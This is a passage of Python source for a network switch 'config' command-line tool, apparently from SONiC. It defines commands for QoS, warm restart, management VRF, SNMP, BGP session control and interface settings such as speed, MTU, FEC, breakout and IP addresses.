""" Start PFC WD by default configurations """
cmd = "pfcwd start_default"
clicommon.run_command(cmd, display_cmd=verbose)
#
# 'qos' group ('config qos ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def qos(ctx):
"""QoS-related configuration tasks"""
pass
@qos.command('clear')
def clear():
"""Clear QoS configuration"""
log.log_info("'qos clear' executing...")
_clear_qos()
def _update_buffer_calculation_model(config_db, model):
"""Update the buffer calculation model into CONFIG_DB"""
buffer_model_changed = False
device_metadata = config_db.get_entry('DEVICE_METADATA', 'localhost')
if device_metadata.get('buffer_model') != model:
buffer_model_changed = True
device_metadata['buffer_model'] = model
config_db.set_entry('DEVICE_METADATA', 'localhost', device_metadata)
return buffer_model_changed
@qos.command('reload')
@click.pass_context
@click.option('--no-dynamic-buffer', is_flag=True, help="Disable dynamic buffer calculation")
@click.option(
'--json-data', type=click.STRING,
help="json string with additional data, valid with --dry-run option"
)
@click.option(
'--dry_run', type=click.STRING,
help="Dry run, writes config to the given file"
)
def reload(ctx, no_dynamic_buffer, dry_run, json_data):
"""Reload QoS configuration"""
log.log_info("'qos reload' executing...")
_clear_qos()
_, hwsku_path = device_info.get_paths_to_platform_and_hwsku_dirs()
sonic_version_file = device_info.get_sonic_version_file()
from_db = "-d --write-to-db"
if dry_run:
from_db = "--additional-data \'{}\'".format(json_data) if json_data else ""
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
buffer_model_updated = False
vendors_supporting_dynamic_buffer = ["mellanox"]
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
asic_id_suffix = ""
config_db = ConfigDBConnector()
else:
asic_id = multi_asic.get_asic_id_from_name(ns)
if asic_id is None:
click.secho(
"Command 'qos reload' failed with invalid namespace '{}'".
format(ns),
fg="yellow"
)
raise click.Abort()
asic_id_suffix = str(asic_id)
config_db = ConfigDBConnector(
use_unix_socket_path=True, namespace=ns
)
config_db.connect()
if not no_dynamic_buffer and asic_type in vendors_supporting_dynamic_buffer:
buffer_template_file = os.path.join(hwsku_path, asic_id_suffix, "buffers_dynamic.json.j2")
buffer_model_updated |= _update_buffer_calculation_model(config_db, "dynamic")
else:
buffer_template_file = os.path.join(hwsku_path, asic_id_suffix, "buffers.json.j2")
if asic_type in vendors_supporting_dynamic_buffer:
buffer_model_updated |= _update_buffer_calculation_model(config_db, "traditional")
if os.path.isfile(buffer_template_file):
qos_template_file = os.path.join(
hwsku_path, asic_id_suffix, "qos.json.j2"
)
if os.path.isfile(qos_template_file):
cmd_ns = "" if ns is DEFAULT_NAMESPACE else "-n {}".format(ns)
fname = "{}{}".format(dry_run, asic_id_suffix) if dry_run else "config-db"
command = "{} {} {} -t {},{} -t {},{} -y {}".format(
SONIC_CFGGEN_PATH, cmd_ns, from_db, buffer_template_file,
fname, qos_template_file, fname, sonic_version_file
)
# Apply the configurations only when both buffer and qos
# configuration files are present
clicommon.run_command(command, display_cmd=True)
else:
click.secho("QoS definition template not found at {}".format(
qos_template_file
), fg="yellow")
else:
click.secho("Buffer definition template not found at {}".format(
buffer_template_file
), fg="yellow")
if buffer_model_updated:
print("Buffer calculation model updated, restarting swss is required to take effect")
def is_dynamic_buffer_enabled(config_db):
"""Return whether the current system supports dynamic buffer calculation"""
device_metadata = config_db.get_entry('DEVICE_METADATA', 'localhost')
return 'dynamic' == device_metadata.get('buffer_model')
#
# 'warm_restart' group ('config warm_restart ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='warm_restart')
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def warm_restart(ctx, redis_unix_socket_path):
"""warm_restart-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
# warm restart enable/disable config is put in stateDB, not persistent across cold reboot, not saved to config_DB.json file
state_db = SonicV2Connector(host='127.0.0.1')
state_db.connect(state_db.STATE_DB, False)
TABLE_NAME_SEPARATOR = '|'
prefix = 'WARM_RESTART_ENABLE_TABLE' + TABLE_NAME_SEPARATOR
ctx.obj = {'db': config_db, 'state_db': state_db, 'prefix': prefix}
@warm_restart.command('enable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_enable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'true')
state_db.close(state_db.STATE_DB)
@warm_restart.command('disable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_enable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'false')
state_db.close(state_db.STATE_DB)
@warm_restart.command('neighsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_neighsyncd_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1, 9999):
ctx.fail("neighsyncd warm restart timer must be in range 1-9999")
db.mod_entry('WARM_RESTART', 'swss', {'neighsyncd_timer': seconds})
@warm_restart.command('bgp_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_bgp_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1, 3600):
ctx.fail("bgp warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_timer': seconds})
@warm_restart.command('teamsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_teamsyncd_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1, 3600):
ctx.fail("teamsyncd warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'teamd', {'teamsyncd_timer': seconds})
@warm_restart.command('bgp_eoiu')
@click.argument('enable', metavar='<enable>', default='true', required=False, type=click.Choice(["true", "false"]))
@click.pass_context
def warm_restart_bgp_eoiu(ctx, enable):
db = ctx.obj['db']
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_eoiu': enable})
def mvrf_restart_services():
"""Restart interfaces-config service and NTP service when mvrf is changed"""
"""
When mvrf is enabled, eth0 should be moved to mvrf; when it is disabled,
move it back to default vrf. Restarting the "interfaces-config" service
will recreate the /etc/network/interfaces file and restart the
"networking" service that takes care of the eth0 movement.
NTP service should also be restarted to rerun the NTP service with or
without "cgexec" accordingly.
"""
cmd="service ntp stop"
os.system (cmd)
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="service ntp start"
os.system (cmd)
def vrf_add_management_vrf(config_db):
"""Enable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if entry and entry['mgmtVrfEnabled'] == 'true' :
click.echo("ManagementVRF is already Enabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG', "vrf_global", {"mgmtVrfEnabled": "true"})
mvrf_restart_services()
"""
The regular expression for grep in below cmd is to match eth0 line in /proc/net/route, sample file:
$ cat /proc/net/route
Iface Destination Gateway Flags RefCnt Use Metric Mask MTU Window IRTT
eth0 00000000 01803B0A 0003 0 0 202 00000000 0 0 0
"""
cmd = "cat /proc/net/route | grep -E \"eth0\s+00000000\s+[0-9A-Z]+\s+[0-9]+\s+[0-9]+\s+[0-9]+\s+202\" | wc -l"
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
output = proc.communicate()
if int(output[0]) >= 1:
cmd="ip -4 route del default dev eth0 metric 202"
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
proc.communicate()
if proc.returncode != 0:
click.echo("Could not delete eth0 route")
def vrf_delete_management_vrf(config_db):
"""Disable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if not entry or entry['mgmtVrfEnabled'] == 'false' :
click.echo("ManagementVRF is already Disabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG', "vrf_global", {"mgmtVrfEnabled": "false"})
mvrf_restart_services()
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmpagentaddress(ctx):
"""SNMP agent listening IP address, port, vrf configuration"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
ip_family = {4: AF_INET, 6: AF_INET6}
@snmpagentaddress.command('add')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def add_snmp_agent_address(ctx, agentip, port, vrf):
"""Add the SNMP agent listening IP:Port%Vrf configuration"""
#Construct SNMP_AGENT_ADDRESS_CONFIG table key in the format ip|<port>|<vrf>
if not clicommon.is_ipaddress(agentip):
click.echo("Invalid IP address")
return False
config_db = ctx.obj['db']
if not vrf:
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if entry and entry['mgmtVrfEnabled'] == 'true' :
click.echo("ManagementVRF is Enabled. Provide vrf.")
return False
found = 0
ip = ipaddress.ip_address(agentip)
for intf in netifaces.interfaces():
ipaddresses = netifaces.ifaddresses(intf)
if ip_family[ip.version] in ipaddresses:
for ipaddr in ipaddresses[ip_family[ip.version]]:
if agentip == ipaddr['addr']:
found = 1
break;
if found == 1:
break;
else:
click.echo("IP addfress is not available")
return
key = agentip+'|'
if port:
key = key+port
#snmpd does not start if we have two entries with same ip and port.
key1 = "SNMP_AGENT_ADDRESS_CONFIG|" + key + '*'
entry = config_db.get_keys(key1)
if entry:
ip_port = agentip + ":" + port
click.echo("entry with {} already exists ".format(ip_port))
return
key = key+'|'
if vrf:
key = key+vrf
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, {})
#Restarting the SNMP service will regenerate snmpd.conf and rerun snmpd
cmd="systemctl restart snmp"
os.system (cmd)
@snmpagentaddress.command('del')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def del_snmp_agent_address(ctx, agentip, port, vrf):
"""Delete the SNMP agent listening IP:Port%Vrf configuration"""
key = agentip+'|'
if port:
key = key+port
key = key+'|'
if vrf:
key = key+vrf
config_db = ctx.obj['db']
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, None)
cmd="systemctl restart snmp"
os.system (cmd)
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmptrap(ctx):
"""SNMP Trap server configuration to send traps"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@snmptrap.command('modify')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.argument('serverip', metavar='<SNMP TRAP SERVER IP Address>', required=True)
@click.option('-p', '--port', help="SNMP Trap Server port, default 162", default="162")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None", default="None")
@click.option('-c', '--comm', help="Community", default="public")
@click.pass_context
def modify_snmptrap_server(ctx, ver, serverip, port, vrf, comm):
"""Modify the SNMP Trap server configuration"""
#SNMP_TRAP_CONFIG for each SNMP version
config_db = ctx.obj['db']
if ver == "1":
#By default, v1TrapDest value in snmp.yml is "NotConfigured". Modify it.
config_db.mod_entry('SNMP_TRAP_CONFIG', "v1TrapDest", {"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
elif ver == "2":
config_db.mod_entry('SNMP_TRAP_CONFIG', "v2TrapDest", {"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
else:
config_db.mod_entry('SNMP_TRAP_CONFIG', "v3TrapDest", {"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
cmd="systemctl restart snmp"
os.system (cmd)
@snmptrap.command('del')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.pass_context
def delete_snmptrap_server(ctx, ver):
"""Delete the SNMP Trap server configuration"""
config_db = ctx.obj['db']
if ver == "1":
config_db.mod_entry('SNMP_TRAP_CONFIG', "v1TrapDest", None)
elif ver == "2":
config_db.mod_entry('SNMP_TRAP_CONFIG', "v2TrapDest", None)
else:
config_db.mod_entry('SNMP_TRAP_CONFIG', "v3TrapDest", None)
cmd="systemctl restart snmp"
os.system (cmd)
#
# 'bgp' group ('config bgp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def bgp():
"""BGP-related configuration tasks"""
pass
#
# 'shutdown' subgroup ('config bgp shutdown ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def shutdown():
"""Shut down BGP session(s)"""
pass
# 'all' subcommand
@shutdown.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Shut down all BGP sessions
In the case of Multi-Asic platform, we shut only the EBGP sessions with external neighbors.
"""
log.log_info("'bgp shutdown all' executing...")
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db)
for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'down', verbose)
# 'neighbor' subcommand
@shutdown.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
"""Shut down BGP session by neighbor IP address or hostname.
User can specify either internal or external BGP neighbor to shutdown
"""
log.log_info("'bgp shutdown neighbor {}' executing...".format(ipaddr_or_hostname))
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'down', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
@bgp.group(cls=clicommon.AbbreviationGroup)
def startup():
"""Start up BGP session(s)"""
pass
# 'all' subcommand
@startup.command()
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def all(verbose):
"""Start up all BGP sessions
In the case of Multi-Asic platform, we startup only the EBGP sessions with external neighbors.
"""
log.log_info("'bgp startup all' executing...")
namespaces = [DEFAULT_NAMESPACE]
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
bgp_neighbor_ip_list = _get_all_neighbor_ipaddresses(config_db)
for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'up', verbose)
# 'neighbor' subcommand
@startup.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
log.log_info("'bgp startup neighbor {}' executing...".format(ipaddr_or_hostname))
"""Start up BGP session by neighbor IP address or hostname.
User can specify either internal or external BGP neighbor to startup
"""
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'up', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
#
# 'remove' subgroup ('config bgp remove ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def remove():
"Remove BGP neighbor configuration from the device"
pass
@remove.command('neighbor')
@click.argument('neighbor_ip_or_hostname', metavar='<neighbor_ip_or_hostname>', required=True)
def remove_neighbor(neighbor_ip_or_hostname):
"""Deletes BGP neighbor configuration of given hostname or ip from devices
User can specify either internal or external BGP neighbor to remove
"""
namespaces = [DEFAULT_NAMESPACE]
removed_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
# namespaces (in case of multi ASIC) and do the sepcified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
removed_neighbor = True
if not removed_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(neighbor_ip_or_hostname))
#
# 'interface' group ('config interface ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO add "hidden=True if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def interface(ctx, namespace):
"""Interface-related configuration tasks"""
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'config_db': config_db, 'namespace': str(namespace)}
#
# 'startup' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def startup(ctx, interface_name):
"""Start up interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
log.log_info("'interface startup {}' executing...".format(interface_name))
port_dict = config_db.get_table('PORT')
for port_name in port_dict:
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "up"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list:
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "up"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list:
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "up"})
#
# 'shutdown' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def shutdown(ctx, interface_name):
"""Shut down interface"""
log.log_info("'interface shutdown {}' executing...".format(interface_name))
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
port_dict = config_db.get_table('PORT')
for port_name in port_dict:
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "down"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list:
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "down"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list:
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "down"})
#
# 'speed' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_speed', metavar='<interface_speed>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def speed(ctx, interface_name, interface_speed, verbose):
"""Set interface speed"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
log.log_info("'interface speed {} {}' executing...".format(interface_name, interface_speed))
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -s {}".format(interface_name, interface_speed)
else:
command = "portconfig -p {} -s {} -n {}".format(interface_name, interface_speed, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'breakout' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('mode', required=True, type=click.STRING, autocompletion=_get_breakout_options)
@click.option('-f', '--force-remove-dependencies', is_flag=True, help='Clear all dependencies internally first.')
@click.option('-l', '--load-predefined-config', is_flag=True, help='load predefied user configuration (alias, lanes, speed etc) first.')
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false, expose_value=False, prompt='Do you want to Breakout the port, continue?')
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
@click.pass_context
def breakout(ctx, interface_name, mode, verbose, force_remove_dependencies, load_predefined_config):
""" Set interface breakout mode """
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
click.secho("[ERROR] Breakout feature is not available without platform.json file", fg='red')
raise click.Abort()
# Get the config_db connector
config_db = ctx.obj['config_db']
target_brkout_mode = mode
# Get current breakout mode
cur_brkout_dict = config_db.get_table('BREAKOUT_CFG')
cur_brkout_mode = cur_brkout_dict[interface_name]["brkout_mode"]
# Validate Interface and Breakout mode
if not _validate_interface_mode(ctx, breakout_cfg_file, interface_name, mode, cur_brkout_mode):
raise click.Abort()
""" Interface Deletion Logic """
# Get list of interfaces to be deleted
del_ports = get_child_ports(interface_name, cur_brkout_mode, breakout_cfg_file)
del_intf_dict = {intf: del_ports[intf]["speed"] for intf in del_ports}
if del_intf_dict:
""" shut down all the interface before deletion """
ret = shutdown_interfaces(ctx, del_intf_dict)
if not ret:
raise click.Abort()
click.echo("\nPorts to be deleted : \n {}".format(json.dumps(del_intf_dict, indent=4)))
else:
click.secho("[ERROR] del_intf_dict is None! No interfaces are there to be deleted", fg='red')
raise click.Abort()
""" Interface Addition Logic """
# Get list of interfaces to be added
add_ports = get_child_ports(interface_name, target_brkout_mode, breakout_cfg_file)
add_intf_dict = {intf: add_ports[intf]["speed"] for intf in add_ports}
if add_intf_dict:
click.echo("Ports to be added : \n {}".format(json.dumps(add_intf_dict, indent=4)))
else:
click.secho("[ERROR] port_dict is None!", fg='red')
raise click.Abort()
""" Special Case: Dont delete those ports where the current mode and speed of the parent port
remains unchanged to limit the traffic impact """
click.secho("\nAfter running Logic to limit the impact", fg="cyan", underline=True)
matched_items = [intf for intf in del_intf_dict if intf in add_intf_dict and del_intf_dict[intf] == add_intf_dict[intf]]
# Remove the interface which remains unchanged from both del_intf_dict and add_intf_dict
for item in matched_items:
del_intf_dict.pop(item)
add_intf_dict.pop(item)
click.secho("\nFinal list of ports to be deleted : \n {} \nFinal list of ports to be added : \n {}".format(json.dumps(del_intf_dict, indent=4), json.dumps(add_intf_dict, indent=4), fg='green', blink=True))
if not add_intf_dict:
click.secho("[ERROR] add_intf_dict is None or empty! No interfaces are there to be added", fg='red')
raise click.Abort()
port_dict = {}
for intf in add_intf_dict:
if intf in add_ports:
port_dict[intf] = add_ports[intf]
# writing JSON object
with open('new_port_config.json', 'w') as f:
json.dump(port_dict, f, indent=4)
# Start Interation with Dy Port BreakOut Config Mgmt
try:
""" Load config for the commands which are capable of change in config DB """
cm = load_ConfigMgmt(verbose)
""" Delete all ports if forced else print dependencies using ConfigMgmt API """
final_delPorts = [intf for intf in del_intf_dict]
""" Warn user if tables without yang models exist and have final_delPorts """
breakout_warnUser_extraTables(cm, final_delPorts, confirm=True)
# Create a dictionary containing all the added ports with its capabilities like alias, lanes, speed etc.
portJson = dict(); portJson['PORT'] = port_dict
# breakout_Ports will abort operation on failure, So no need to check return
breakout_Ports(cm, delPorts=final_delPorts, portJson=portJson, force=force_remove_dependencies,
loadDefConfig=load_predefined_config, verbose=verbose)
# Set Current Breakout mode in config DB
brkout_cfg_keys = config_db.get_keys('BREAKOUT_CFG')
if interface_name not in brkout_cfg_keys:
click.secho("[ERROR] {} is not present in 'BREAKOUT_CFG' Table!".format(interface_name), fg='red')
raise click.Abort()
config_db.set_entry("BREAKOUT_CFG", interface_name, {'brkout_mode': target_brkout_mode})
click.secho("Breakout process got successfully completed."
.format(interface_name), fg="cyan", underline=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
except Exception as e:
click.secho("Failed to break out Port. Error: {}".format(str(e)), fg='magenta')
sys.exit(0)
def _get_all_mgmtinterface_keys():
"""Returns list of strings containing mgmt interface keys
"""
config_db = ConfigDBConnector()
config_db.connect()
return list(config_db.get_table('MGMT_INTERFACE').keys())
def mgmt_ip_restart_services():
"""Restart the required services when mgmt inteface IP address is changed"""
"""
Whenever the eth0 IP address is changed, restart the "interfaces-config"
service which regenerates the /etc/network/interfaces file and restarts
the networking service to make the new/null IP address effective for eth0.
"ntp-config" service should also be restarted based on the new
eth0 IP address since the ntp.conf (generated from ntp.conf.j2) is
made to listen on that particular eth0 IP address or reset it back.
"""
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="systemctl restart ntp-config"
os.system (cmd)
#
# 'mtu' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_mtu', metavar='<interface_mtu>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def mtu(ctx, interface_name, interface_mtu, verbose):
"""Set interface mtu"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
portchannel_member_table = config_db.get_table('PORTCHANNEL_MEMBER')
if interface_is_in_portchannel(portchannel_member_table, interface_name):
ctx.fail("'interface_name' is in portchannel!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -m {}".format(interface_name, interface_mtu)
else:
command = "portconfig -p {} -m {} -n {}".format(interface_name, interface_mtu, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_fec', metavar='<interface_fec>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def fec(ctx, interface_name, interface_fec, verbose):
"""Set interface fec"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if interface_fec not in ["rs", "fc", "none"]:
ctx.fail("'fec not in ['rs', 'fc', 'none']!")
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -f {}".format(interface_name, interface_fec)
else:
command = "portconfig -p {} -f {} -n {}".format(interface_name, interface_fec, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'ip' subgroup ('config interface ip ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ip(ctx):
"""Add or remove IP address"""
pass
#
# 'add' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.argument('gw', metavar='<default gateway IP address>', required=False)
@click.pass_context
def add(ctx, interface_name, ip_addr, gw):
"""Add an IP address towards the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(ip_addr, strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
# Configuring more than 1 IPv4 or more than 1 IPv6 address fails.
# Allow only one IPv4 and only one IPv6 address to be configured for IPv6.
# If a row already exist, overwrite it (by doing delete and add).
mgmtintf_key_list = _get_all_mgmtinterface_keys()
for key in mgmtintf_key_list:
# For loop runs for max 2 rows, once for IPv4 and once for IPv6.
# No need to capture the exception since the ip_addr is already validated earlier
